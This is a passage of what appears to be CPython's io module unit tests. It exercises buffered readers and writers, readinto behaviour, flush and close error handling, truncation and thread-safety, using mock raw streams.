def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", buffering=0)
def test_invalid_newline(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(path, "r", encoding="utf-8") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(os_helper.TESTFN))
check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN)))
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w', encoding="utf-8")
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(os_helper.TESTFN), 'rwxa', encoding="utf-8")
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(os_helper.TESTFN, "wb") as f:
f.write(s)
with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
def test_bad_readinto_value(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: -1
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsNone(cm.exception.__cause__)
def test_bad_readinto_type(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: b''
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsInstance(cm.exception.__cause__, TypeError)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(os_helper.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
@threading_helper.requires_working_threading()
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
